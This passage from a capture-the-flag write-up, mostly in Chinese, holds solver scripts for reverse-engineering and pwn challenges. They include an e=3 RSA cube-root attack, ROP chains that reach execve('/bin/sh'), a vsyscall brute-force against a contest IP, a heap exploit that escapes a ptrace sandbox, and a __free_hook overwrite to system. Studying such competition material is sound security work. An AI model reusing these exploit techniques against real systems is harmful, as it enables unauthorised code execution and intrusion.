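    var Y = new Array(X[35].toString(16), X[34].toString(16), X[33].toString(16), X[32].toString(16))
    return Y;
}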
// Recover the three plaintext blocks. The three four-word ciphertexts are the
// `ans` array and the key is the `key` array pushed in the snapshot bytecode
// above; the checker compared encrypt(chunk, key) against `ans` chunk by chunk.
// Each word was built by the bytecode as num = num * 256 + input.charCodeAt(i),
// i.e. four characters per word, big-endian. (Globals are assigned without `var`.)
ciphertext = new Array(1605062385, -642825121, 2061445208, 1405610911);
ciphertext2 = new Array(1713399267, 1396669315, 1081797168, 605181189)
ciphertext3 = new Array(1824766525, 1196148725, 763423307, 1125925868)
key = new Array(19088743, 2309737967, 4275878552, 1985229328);
// Each call prints four hex words (X35..X32 order, see KJUR_decrypt_sm4).
console.log(KJUR_decrypt_sm4(ciphertext, key))
console.log(KJUR_decrypt_sm4(ciphertext2, key))
console.log(KJUR_decrypt_sm4(ciphertext3, key))
rocket
下了个断点,找到启动 rocket 的命令,发现是从当前 bin 中加载代码,找到对应位置搜索 “Input”,发现附近有一个很长的 hex 数据,又结合输出的内容都是 x ^ 3,猜测是 e = 3 的 rsa,使用如下脚本进行解密(e = 3 小明文攻击)
import gmpy2
import time
from Crypto.Util.number import long_to_bytes
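n = 0xeb2bfe8de9bea9084b6c9ae8a80ed7d63d3f476d18749059cf5355de7e50a0e5caec565558f80c8b020343d13f4313adba67e9c7166a9e8c4f87ffbebd05c45f8249ac247cc33b6a728cecd50f3d4ae5d99a5eb1f4ddc1d180ea109e72310263e38d22b9967bd974be352eccc57dd758f2a8160204dd7a67357f7ec7e140186f825577f2ffe607bec21de9edfbcaaf227b711b14c7859455cc17e23642aac3f7f42f23e945ba5e7f6f1f008b24ed977f242f2fb9406848cb49c54af3f463c9609daa8ac3716c4d0d3fe6c1386298f481fcc20bed6ed078913fa04eeddd8033e7713efdae5f57603ab4305aefcfd205b2f315f392709d06bdfa23d6e89b9a617b
e = 3
res = 0
c = 7212272804013543391008421832457418223544765489764042171135982569211377620290274828526744558976950004052088838419495093523281490171119109149692343753662521483209758621522737222024221994157092624427343057143179489608942837157528031299236230089474932932551406181
# Small-exponent (e = 3) attack on unpadded RSA: c = m**3 mod n, and the message
# is short enough that m**3 = c + k*n for a small k, so the first k at which
# c + k*n is a perfect cube gives m directly — no private key involved.
# Mitigation is randomized padding (RSAES-OAEP): the padded message is then as
# large as n and m**e wraps, which defeats this cube-root search.
for k in range(200000000):
    # iroot returns (root, is_exact); call it once per k instead of twice.
    root, exact = gmpy2.iroot(c + n * k, 3)
    if exact:
        res = root
        print(k, res)
        print(long_to_bytes(res))
        break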
PWN
protocol
静态编译栈溢出 ret2syscall即可
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
import ctf_pb2
context.log_level = 'debug'
binary = 'protocol'
elf = ELF('protocol')
libc = elf.libc
context.binary = binary
# Remote target when host and port are given on the command line, else a local process.
if(len(sys.argv) == 3):
    sh = remote(sys.argv[1],sys.argv[2])
else:
    sh = process(binary)
# One-line I/O helpers. The leak helpers l64/l32 are not used below: the binary is
# statically linked, so the gadget addresses further down are fixed and no leak is needed.
l64 = lambda :u64(sh.recvuntil("\\x7f")[-6:].ljust(8,"\\x00"))
l32 = lambda :u32(sh.recvuntil("\\xf7")[-4:].ljust(4,"\\x00"))
sla = lambda a,b :sh.sendlineafter(str(a),str(b))
sa = lambda a,b :sh.sendafter(str(a),str(b))
lg = lambda name,data : sh.success(name + ": 0x%x" % data)
se = lambda payload: sh.send(payload)
rl = lambda : sh.recv()
sl = lambda payload: sh.sendline(payload)
ru = lambda a :sh.recvuntil(str(a))
def new_ctf(username = b"admin",password = b"admin"):
    # One login round-trip: serialize the generated protobuf message `pwn`
    # (from ctf_pb2) with the given username/password and send it after the
    # "Login: " prompt. The username field is the overflow vector used below.
    ctf = ctf_pb2.pwn()
    ctf.username = username
    ctf.password = password
    payload = ctf.SerializeToString()
    sh.sendafter(b"Login: ", payload)
def send_payload(offset,payload):
    # Place one 8-byte word of the ROP chain `offset` bytes past the 0x148-byte
    # username buffer, using several logins whose username length shrinks by one
    # byte each time (presumably because the copy is NUL-terminated, so each login
    # fixes one more byte — not verifiable from this script alone).
    # Three cases: payload 0 (all-zero word), a single byte value, and a 3-byte
    # address (p32(payload)[:3]); offset 0 is a special case of the last.
    # NOTE(review): `if (payload) == 0` is just `payload == 0`; the print() calls
    # are leftover debugging output.
    if (payload) == 0:
        # new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x8,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x7,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x6,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x5,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x4,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x3,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x2,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x1,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a',b"c"*0x100)
    elif payload < 0xff and payload > 0:
        print("aaa")
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x7,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x6,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x5,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x4,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x3,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x2,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p8(payload),b"c"*0x100)
        # new_ctf(b"a"*0x148 + offset*b'a',b"c"*0x100)
    elif offset == 0:
        print("bbbb")
        new_ctf(b"a"*0x148+p32(payload)[:3],b"c"*0x100)
    else:
        # new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x5,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x4,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x3,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x2,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3] + b'a'*0x1,b"c"*0x100)
        new_ctf(b"a"*0x148 + offset*b'a' + p32(payload)[:3],b"c"*0x100)
# Gadget addresses are constants because the binary is statically linked and
# not position independent (the writeup: "静态编译栈溢出 ret2syscall"). The short
# "# 0"-style lines are the author's notes of the register values used below.
# Defender's view: the root cause per the writeup is an unbounded copy of the
# protobuf username into a fixed 0x148-byte stack buffer; PIE plus a stack canary
# would have removed both the fixed gadgets and the silent overwrite.
pop_rdi = 0x0000000000404982
# 0
pop_rsi = 0x0000000000588bbe
# 0x81a2a0+0x400
pop_rdx = 0x000000000040454f
# 0x200
pop_rax = 0x00000000005bdb8a
#0
syscall = 0x000000000068f0a4
pop_rsp = 0x00000000005a350a
#0x81a2a0+0x400
# attach(sh)
# The chain is written from its highest slot (0x88) down to slot 0, one
# send_payload() call per 8-byte word. Read bottom-up it appears to be two
# syscalls: read(0, 0x81a2a0+0x400, 7) and then execve(0x81a2a0+0x400, 0, 0)
# (rax = 0x3b).
send_payload(0x88,syscall)
send_payload(0x80,0x3b)
send_payload(0x78,pop_rax)
send_payload(0x70,0)
send_payload(0x68,pop_rdx)
send_payload(0x60,0)
send_payload(0x58,pop_rsi)
send_payload(0x50,0x81a2a0+0x400)
send_payload(0x48,pop_rdi)
send_payload(0x40,syscall)
send_payload(0x38,0)
send_payload(0x30,pop_rax)
send_payload(0x28,0x7)
send_payload(0x20,pop_rdx)
send_payload(0x18,0x81a2a0+0x400)
send_payload(0x10,pop_rsi)
send_payload(0x8,0)
send_payload(0,0)
send_payload(0,pop_rdi)
# A final login with the default credentials; presumably this is the request whose
# return lands in the chain, after which the read() in the chain waits on stdin.
new_ctf()
sh.interactive()
"""
p = p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b80) # @ .data
p += p64(0x00000000005bdb8a) # pop rax ; ret
p += b'/bin/sh;'
p += p64(0x00000000005b6835) # mov qword ptr [rsi], rax ; ret
p += p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x00000000006c6a69) # xor rax, rax ; ret
p += p64(0x00000000005b6835) # mov qword ptr [rsi], rax ; ret
p += p64(0x0000000000404982) # pop rdi ; ret
p += p64(0x0000000000817b80) # @ .data
p += p64(0x0000000000588bbe) # pop rsi ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x000000000040454f) # pop rdx ; ret
p += p64(0x0000000000817b88) # @ .data + 8
p += p64(0x00000000006c6a69) # xor rax, rax ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x00000000006d79a0) # add rax, 1 ; ret
p += p64(0x0000000000403c99) # syscall
"""
unexploitable
栈溢出,利用 VSDO 填第一个返回地址,然后部分覆盖 libc 的地址(第二个返回地址)为 one_gadget,需要 1/4096 爆破
from pwn import *
#context.log_level = "debug"
context.timeout = 10
# Retry loop: the trailing three bytes only partially overwrite a libc address,
# and the 12 bits not fixed by the page offset have to be guessed (1/4096 per try,
# as the writeup says), so each iteration reconnects until "flag" appears.
while(1):
    try:
        sh = remote('47.95.3.91', 41632)
        # 0x18 bytes of filler, two copies of 0xffffffffff600400 — an address inside
        # the legacy fixed-address vsyscall page (the writeup calls it VSDO), usable
        # without any leak — then the 3-byte partial overwrite of the next return
        # address. Mitigation on the host side: booting with vsyscall=none (or xonly)
        # removes that fixed-address code from every process.
        sh.send('a' * 0x18 + p64(0xffffffffff600400) * 2 + '\\x02\\xc3\\x4f')
        sleep(0.1)
        for i in range(3):
            sh.sendline("cat flag")
            sleep(0.1)
        # sh.interactive()
        data = sh.recv()
        print(data)
        if "flag" in data:
            break
    except Exception as e:
        print(e)
        # NOTE(review): if remote() itself raised on the first iteration, `sh` is
        # still unbound here and this close() raises NameError out of the loop.
        sh.close()
sh.interactive()
sandboxheap
菜单题套个调试器实现的沙箱
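// Decompiled tracer that implements the challenge "sandbox". The parent runs the
// target under PTRACE_SYSCALL and stops at every syscall entry and exit. At entry
// it consults regs_map[orig_rax]: a non-zero entry means "blocked" and the syscall
// number is rewritten to -1 so the kernel fails it. Two numbers are handled by the
// tracer itself: 0x2710 (10000) forwards rdi to set_map(), i.e. the traced program
// can rewrite its own allow-list, and 0x3C / 0xE7 (exit, exit_group) stop the tracer.
// Defender's note: a policy-mutation entry point reachable from the sandboxed
// process defeats the sandbox; a seccomp-bpf filter installed before exec has no
// such entry point.
// (Fix relative to the pasted listing: the mis-encoded "®s" tokens are "&regs".)
void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
  __pid_t v3; // eax
  unsigned int v4; // ebx
  unsigned __int64 orig_rax; // rax
  int *v6; // rax
  char *v7; // rax
  struct user_regs_struct regs; // [rsp+0h] [rbp-108h] BYREF
  unsigned __int64 v9; // [rsp+D8h] [rbp-30h]

  v9 = __readfsqword(0x28u);                    // stack canary
  if ( a1 <= 1 )
  {
    __fprintf_chk(stderr, 1LL, "strace: too few arguments: %d", (unsigned int)a1);
  }
  else
  {
    v3 = fork();
    v4 = v3;
    if ( v3 != -1 )
    {
      if ( v3 )
      {
        // Parent: wait for the child's exec stop, then set PTRACE_O_EXITKILL
        // (0x100000) so the child dies with the tracer.
        waitpid(v3, 0LL, 0);
        ptrace(PTRACE_SETOPTIONS, v4, 0LL, 0x100000LL);
        do
        {
          // Syscall-entry stop.
          if ( ptrace(PTRACE_SYSCALL, v4, 0LL, 0LL) == -1
            || waitpid(v4, 0LL, 0) == -1
            || ptrace(PTRACE_GETREGS, v4, 0LL, &regs) == -1 )
          {
            break;
          }
          if ( regs.orig_rax == 0x25 )              // alarm: (re)build the map with flag 1 (see set_map);
            set_map(1);                             // presumably the map is all-zero (allow all) before this
          orig_rax = regs.orig_rax;
          // regs_map has 0x2711 entries (set_map), so index 0x2710 is in bounds.
          if ( LODWORD(regs.orig_rax) <= 0x2710 && regs_map[SLODWORD(regs.orig_rax)] )
          {
            // Blocked: replace the syscall number with -1 so the kernel rejects it.
            regs.orig_rax = -1LL;
            if ( ptrace(PTRACE_SETREGS, v4, 0LL, &regs) == -1 )
              break;
            orig_rax = regs.orig_rax;
          }
          switch ( orig_rax )
          {
            case 0xE7uLL:                           // exit_group
              goto LABEL_24;
            case 0x2710uLL:                         // pseudo-syscall: tracee picks its own policy flags
              set_map(regs.rdi);
              break;
            case 0x3CuLL:                           // exit
LABEL_24:
              exit(regs.rdi);
          }
        }
        // Syscall-exit stop. Offset 0x50 is rax in struct user_regs_struct; the
        // POKEUSER data argument was dropped by the decompiler — presumably it
        // sets the return value of a blocked (-1) or pseudo (10000) syscall.
        while ( ptrace(PTRACE_SYSCALL, v4, 0LL, 0LL) != -1
             && waitpid(v4, 0LL, 0) != -1
             && (regs.orig_rax != 10000 && regs.orig_rax != -1LL || ptrace(PTRACE_POKEUSER, v4, 0x50LL) != -1) );
      }
      else
      {
        // Child: ask to be traced, then exec the sandboxed program (argv[1..]).
        ptrace(PTRACE_TRACEME, 0LL, 0LL, 0LL);
        execvp(a2[1], a2 + 1);
      }
    }
    v6 = __errno_location();
    v7 = strerror(*v6);
    __fprintf_chk(stderr, 1LL, "strace: %s", v7);
  }
  fputc(10, stderr);
  exit(1);
}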
set_map 设置一个 syscall_allow 数组
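// Rebuild the syscall policy table used by main(): entry value 1 = blocked (the
// syscall number is rewritten to -1), 0 = allowed. Everything is blocked first,
// then a fixed set is re-allowed, and the two flag bits of a1 re-allow the
// read/write family (bit 0) and open (bit 1). The table is indexed by x86_64
// syscall number.
// (Fix relative to the pasted listing: the mis-encoded "®s_map" tokens are "&regs_map".)
void __fastcall set_map(char a1)
{
  memset(regs_map, 1, 0x2711uLL);
  regs_map[3] = 0;                              // sys_close
  *(_DWORD *)&regs_map[9] = 0;                  // sys_mmap — the 4-byte store also clears 10..12 (mprotect, munmap, brk)
  regs_map[60] = 0;                             // sys_exit
  regs_map[231] = 0;                            // sys_exit_group
  if ( (a1 & 1) != 0 )
  {
    regs_map[40] = 0;                           // sys_sendfile64
    *(_WORD *)regs_map = 0;                     // sys_read, sys_write
    *(_DWORD *)&regs_map[17] = 0;               // sys_pread64, sys_pwrite64, sys_readv, sys_writev
    *(_WORD *)&regs_map[295] = 0;               // sys_preadv, sys_pwritev
    byte_204750 = 0;                            // NOTE(review): possibly regs_map[0x2710] split off by the decompiler;
                                                // if so, this is what keeps the 0x2710 pseudo-syscall usable after alarm — confirm
  }
  if ( (a1 & 2) != 0 )
    regs_map[2] = 0;                            // sys_open
}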
堆菜单题，用 ROP 调用 0x2710 号伪系统调用放开 open 调用，然后 ORW 即可；堆菜单部分的做法参考 *bitheap* 这题
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
# Local runs (commented out) either wrap the target in the ptrace sandbox shown
# above or start it bare; the live run talks to the remote instance.
#sh = process(['./sandbox', './sandboxheap'])
sh = remote('39.106.13.71', 15670)
#sh = process(['./sandboxheap'])
def choice(idx):
    # Menu selector; every other helper goes through this.
    sh.sendlineafter("choice: ", str(idx))
def add(idx, size):
    # Menu option 1: allocate entry `idx` with `size` bytes.
    choice(1)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendlineafter("Size: ", str(size))
def edit(idx, content, tag=False):
    # Menu option 2. The program apparently reads the content as an ASCII bit
    # string: each byte of `content` is expanded to its 8 bits, least significant
    # bit first (bin()[2:] zero-padded to 8, then reversed). `tag` appends one
    # extra '0' bit; it is used once below with the forged chunk data, and why
    # that call needs it is not visible from this script.
    choice(2)
    sh.sendlineafter("Index: ", str(idx))
    send_content = ""
    for i in content:
        send_content += bin(u8(i))[2:].rjust(8, '0')[::-1]
    if tag:
        send_content += '0'
    sh.sendafter("Content: ", send_content)
def show(idx):
    # Menu option 3: print entry `idx`; the caller parses the output itself.
    choice(3)
    sh.sendlineafter("Index: ", str(idx))
def delete(idx):
    # Menu option 4: free entry `idx`.
    choice(4)
    sh.sendlineafter("Index: ", str(idx))
# Stage 1: heap address leak. All chunks are 0x88 (0x90 bins); the seven extra
# entries are used below to fill the tcache before the libc leak.
add(0, 0x88)
add(1, 0x88)
for i in range(2, 2 + 7):
    add(i, 0x88)
delete(0)
delete(1)
add(1, 0x88)
add(0, 0x88)
show(1)
# show() prints a heap pointer from chunk 1; 0x260 is the writeup's distance of
# that pointer from the heap base.
heap_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x260
log.success("heap_base:\\t" + hex(heap_base))
# Forged chunk inside entry 1: fd/bk point back at the slot holding fake_ptr, and
# the trailing p64(0x90) is the size field of the next chunk. (The writeup refers
# to the bitheap challenge for the heap technique; offsets are taken from there.)
fake_chunk = heap_base + 0x2e0
fake_ptr = fake_chunk + 0x20
fd = fake_ptr - 0x18
bk = fake_ptr - 0x10
chunk_data = p64(fd) + p64(bk) + p64(fake_chunk)
chunk_data = chunk_data.ljust(0x80, '\\x00') + p64(0x90)
edit(1, chunk_data, True)
# Stage 2: fill the tcache with the seven spare entries so the next free of entry 0
# goes to the unsorted bin, then re-allocate and read a libc pointer out of entry 1.
for i in range(2, 2 + 7):
    delete(i)
delete(0)
for i in range(2, 2 + 7):
    add(i, 0x88)
add(0, 0x88)
show(1)
# 0x3ebca0 is the writeup's libc offset of the leaked pointer (presumably a
# main_arena address of the target's glibc build — not verifiable from here).
libc_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))
# libc gadget/symbol offsets for the target's libc version, from the writeup.
pop_rdi_addr = libc_base + 0x2164f
pop_rsi_addr = libc_base + 0x23a6a
pop_rdx_addr = libc_base + 0x1b96
pop_rax_addr = libc_base + 0x1b500
syscall_addr = libc_base + 0xd2625
free_hook_addr = libc_base + 0x3ed8e8
environ = libc_base + 0x3ee098
gets_addr = libc_base + 0x80060
# Stage 3: stack address leak through libc's `environ` (entry 1 still overlaps the
# freed list, so writing a pointer into it redirects the next allocation).
add(9, 0x88)
delete(0)
delete(9)
edit(1, p64(environ))
add(9, 0x88)
add(0, 0x88)
show(0)
# 0x110 is the writeup's distance from the environ value to the target return slot.
stack = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x110
log.success("stack:\\t" + hex(stack))
# Same redirection again, this time so entry 2 lands at stack - 0x18 (the chain's
# first slot, per the writeup's offsets).
delete(2)
delete(9)
edit(1, p64(stack - 0x18))
add(9, 0x88)
add(2, 0x88)
start_addr = stack - 0x18
# First stage: read(0, stack, 0x200) to pull the second stage in from stdin.
# rax is not set explicitly here; presumably it is already 0 when the chain runs.
rop_chain1 = flat([
    pop_rdi_addr,
    0,
    pop_rsi_addr,
    stack,
    pop_rdx_addr,
    0x200,
    syscall_addr,
])
# Second stage. Its first call is the tracer's pseudo-syscall 0x2710 with rdi = 3,
# i.e. set_map(3) above: this re-allows open (bit 1) and the read/write family
# (bit 0) from inside the sandboxed process — the sandbox lets the tracee rewrite
# its own policy, which is the whole escape. The rest is open/read/write of "flag".
rop_chain2 = flat([
    pop_rdi_addr,
    3,
    pop_rax_addr,
    0x2710,
    syscall_addr,
    pop_rdi_addr,
    start_addr,
    pop_rsi_addr,
    0,
    pop_rax_addr, # sys_open('flag', 0)
    2,
    syscall_addr,
    pop_rax_addr, # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi_addr,
    3,
    pop_rsi_addr,
    start_addr + 0x200,
    pop_rdx_addr,
    0x100,
    syscall_addr,
    pop_rax_addr, # sys_write(1, heap, 0x100)
    1,
    pop_rdi_addr,
    1,
    pop_rsi_addr,
    start_addr + 0x200,
    syscall_addr
])
#gdb.attach(sh, "b *$rebase(0x0000000000000E63)")
# The "flag" path string sits at start_addr (the open() argument above), padded to
# 0x18 so the first-stage chain starts at the return slot.
edit(2, 'flag'.ljust(0x18, '\\x00') + rop_chain1)
# Consumed by the first stage's read(): a sled of `ret` gadgets (pop_rdi_addr + 1)
# followed by the second stage.
sh.sendline(p64(pop_rdi_addr + 1) * 0x10 + rop_chain2)
sh.interactive()
queue
666 为后门位置,可以通过这个来控制 queue 结构体,借此 leak libc 和修改 __free_hook 即可
from pwn import *
context.log_level = "debug"
# Local process (commented out) or the remote instance.
#sh = process('./queue')
sh = remote('101.201.71.136', 12507)
def choice(idx):
    # Menu selector for the "Queue Management" prompt.
    sh.sendlineafter("Queue Management: ", str(idx))
def push(size):
    # Menu option 1: append a new entry of `size` bytes to the queue.
    choice(1)
    sh.sendlineafter("Size: ", str(size))
def change(idx, value_idx, value):
    # Menu option 2: set byte `value_idx` of entry `idx` to `value` (sent as a decimal string).
    choice(2)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendlineafter("Value idx: ", str(value_idx))
    sh.sendlineafter("Value: ", str(value))
def show(idx, num):
    # Menu option 3: print `num` values of entry `idx`; get_show() parses the output.
    choice(3)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendlineafter("Num: ", str(num))
def pop():
    # Menu option 4 without an index: remove (free) the front entry.
    choice(4)
def delete(idx):
    # Menu option 4 with an index. Unused below; whether the program actually
    # prompts for "Index: " on option 4 is not visible here (pop() sends none).
    choice(4)
    sh.sendlineafter("Index: ", str(idx))
def edit(idx, offset, data):
    # Byte-wise write built on change(): one menu round-trip per byte of `data`,
    # starting at `offset` within entry `idx`.
    for x in data:
        change(idx, offset, ord(x))
        offset += 1
def backdoor(idx, content):
    # Hidden menu option 666: sends `content` raw (no newline) after "Content: ".
    # Per the writeup this overwrites the queue's bookkeeping struct for entry `idx`.
    choice(666)
    sh.sendlineafter("Index: ", str(idx))
    sh.sendafter("Content: ", content)
def get_show(size):
    # Collect show()'s output: after "Content: " the program prints one hex number
    # per line; each is converted back to a byte and concatenated, so the result is
    # the raw `size`-byte dump as a (Python 2) str.
    data = ""
    sh.recvuntil('Content: ')
    for i in range(size):
        data += chr(int(sh.recvline(), 16))
    return data
# Two 0x100-byte entries. Entry 0 holds the string that will be passed to system()
# when it is freed through the hijacked __free_hook at the end.
push(0x100) # 0
push(0x100) # 1
edit(0, 0, '/bin/sh')
# edit(1, 0, 'b' * 0x100)
pop()
# Backdoor write over entry 0's struct: 8 filler bytes, 0x1000 (presumably the
# length field), and one byte that partially overwrites the following pointer.
# The enlarged length lets show() dump 0xc0 bytes, the last 8 of which hold a
# heap pointer; 0x126f0 is the writeup's offset of it from the heap base.
backdoor(0, 'a' * 8 + p64(0x1000) + '\\x00')
show(0, 0xc0)
leak_data = get_show(0xc0)
log.hexdump(leak_data)
heap_base = u64(leak_data[-8:]) - 0x126f0
log.success("heap_base:\\t" + hex(heap_base))
# Re-point the struct at a known heap address, then cycle four entries through
# the allocator so a libc pointer ends up where show() can read it.
backdoor(0, p64(heap_base + 0x126a0) + p64(0x8) + '\\xf0')
push(0x100) #1
push(0x100) #2
push(0x100) #3
push(0x100) #4
pop() #4
pop() #3
pop() #2
pop() #1
# Full forged struct (a pointer, a count of 8, then six pointers around the data
# buffer); the layout and heap offsets are the writeup's, not derivable here.
fake_struct = p64(heap_base + 0x131a0) + p64(0x8)
fake_struct += p64(heap_base + 0x13450) + p64(heap_base + 0x13450)
fake_struct += p64(heap_base + 0x13450 + 0x200) + p64(heap_base + 0x131b8)
fake_struct += p64(heap_base + 0x13450 + 0x100) + p64(heap_base + 0x13450)
backdoor(0, fake_struct)
show(0, 0x10)
libc_leak = get_show(0x10)
log.hexdump(libc_leak)
# 0x3ebca0 is the writeup's libc offset of the leaked pointer (presumably a
# main_arena address of the target's glibc build).
libc_base = u64(libc_leak[-8:]) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))
free_hook_addr = libc_base + 0x3ed8e8
system_addr = libc_base + 0x4f420
bin_sh_addr = libc_base + 0x1b3d88
# Same struct layout, with the data pointers aimed at __free_hook, so edit()'s
# byte-wise change() calls write system() over the hook. Defender's note: the
# root cause per the writeup is the hidden handler (666) accepting raw bytes into
# internal metadata; __free_hook itself was removed in glibc 2.34.
fake_struct2 = p64(heap_base + 0x131a0) + p64(0x8)
fake_struct2 += p64(free_hook_addr) + p64(free_hook_addr)
fake_struct2 += p64(free_hook_addr + 0x200) + p64(heap_base + 0x131b8)
fake_struct2 += p64(free_hook_addr + 0x100) + p64(free_hook_addr)
backdoor(0, fake_struct2)
edit(0, 0, p64(system_addr))
#gdb.attach(sh, "b free")
# Freeing the front entry ('/bin/sh') now goes through the hook.
pop()
sh.interactive()
ojs
根据字符串内容找到项目地址:https://github.com/ndreynolds/flathead
编译一份源码，然后用 gdb 的 dprintf 来调试程序，输出所有的 prop，再编写程序进行比对
a = '''prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:create
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperties
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyDescriptor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:keys
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyNames
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:preventExtensions
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isExtensible
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:seal
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isSealed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:freeze
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFrozen
prop:prototype
prop:length
prop:name
